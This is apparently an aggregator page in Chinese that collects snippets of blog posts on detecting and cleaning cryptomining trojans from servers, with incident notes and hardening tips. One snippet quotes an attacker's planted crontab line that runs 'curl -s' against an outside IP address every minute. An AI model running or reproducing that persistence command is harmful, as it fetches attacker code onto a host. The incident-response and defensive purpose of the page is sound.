1、查看流量图发现问题 查看的时候网页非常卡，有的时候甚至没有响应 2、top动态查看进程 我马上远程登录出问题的服务器，远程操作很卡，网卡出去的流量非常大，通过top发现了一个异常的进程占用资源比较高，名字不仔细看还真以为是一个Web服务进程。 4、结束异常进程并继续追踪 ...

什么是挖矿木马 挖矿木马会占用CPU进行超频运算，从而占用主机大量的CPU资源，严重影响服务器上的其他应用的正常运行。黑客为了得到更多的算力资源，一般都会对全网进行无差别扫描，同时利用SSH爆破和漏洞利用等手段攻击主机。部分挖矿木马还具备蠕虫化的特点，在主机被成功入侵之后，挖矿木马还会向内网渗透 ...

如果是云服务器可以在‘云监控-态势与感知’中直接看到木马文件相关进程name，id以及路径如下：文件路径: /opt/apache-tomcat-7.0.104/bin/shell1.elf恶意文件md5: 91cc7f105856a0e9eb6a29ef3d08d9ce进程id: 27504 ...

一般情况下，挖矿病毒都是自动扫描+自动挂马生成的，并不会是有专人进行攻击，所以也比较好清除，注意清除之后需要 check 有无后门。 最重要几点（也可能是被hack的原因）：禁止 ROOT 用户登陆，ROOT 不能使用弱密码，FRP 需要配置，不能使用默认选项。 挖矿进程占用的 CPU 资源 ...

云服务器ECS挖矿木马病毒处理和解决方案 最近由于网络环境安全意识低的原因，导致一些云服务器ECS中了挖矿病毒的坑。 总结了一些解决挖矿病毒的一些思路。由于病毒更新速度快仅供参考。 1、查看cpu爆满的进程 cpu占用率 100%, 用top 查看cpu100 2、杀死进程 ...

最近emr集群跑任务的时候总出现 task failed ，优化sql，调提交任务参数都没解决，最后再我排查时候，发现一个从节点的cpu使用800% 经过一些列排查，发现是被注入木马了， #被人种下的crontab#* * * * * curl -s http://158.69.133.17 ...

转自 https://juejin.im/post/5aa0cc476fb9a028d82b5695最近打开服务变得很慢，然后 CPU，内存占用有达到了100%，打开网站都很慢，这个肯定很反常的，平时cpu不会达到那么高，因此netstat -ntlp 准备看看端口占用是不是有什么异常，有的会看 ...

背景 最近由于在弄springboot shiro的redis session共享的问题，所以在服务器上部署了redis，因为没有太多的考虑所以没有设置密码。 等到第二天的时候，发现redis外网无法访问内网可以。 查看端口绑定情况 netstat -antlp | grep 6379 ...